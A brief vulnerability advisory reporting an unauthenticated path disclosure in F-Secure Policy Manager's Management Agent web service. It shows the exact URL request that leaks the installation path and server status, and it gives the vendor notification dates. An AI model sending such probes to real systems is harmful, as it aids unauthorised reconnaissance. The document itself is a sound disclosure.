F-Secure Policy Manager - physical path disclosure

[<oliver@xxxxxxxxxx>]

F-Secure Policy Manager - Management Agent - physical path disclosure
vulnerability
=====================================================================================

Version:
========

FSMSH Version 5.11.2810 - on Win32 (not tested on other platforms)


Vuln:
=====

A webserver is running on Port 80/tcp. Connecting to the port via a
webbrowser offers the
following link, available without authentication:

        /fsms/fsmsh.dll?FSMSCommand=GetVersion

Following this link will give the Version Number of the application:

        5.11.2810


However.... modifiying the link as follows:

        /fsms/fsmsh.dll?

will give the following result, containing the physical path of the
f-secure installation:

        FSMSH Version 5.11.2810
        Started at: 04/12/07 20:18:48
        Processed requests: 8780        
        Commdir path: C:\Programme\F-Secure\Management Server 5\CommDir
        COMMDIR: C:\Programme\F-Secure\Management Server 5\CommDir found
        C:\Programme\F-Secure\Management Server 5\CommDir\commdir.cfg found
        Repository API initialized - status: OK


Vendor:
=======

www.f-secure.com 
Informed by mail on 07.Dec.2004; Response at 08.Dec.; Will be fixed
anytime.


Discovered by:
==============

oliver karow
This document: http://www.oliverkarow.de/research/f-secure.txt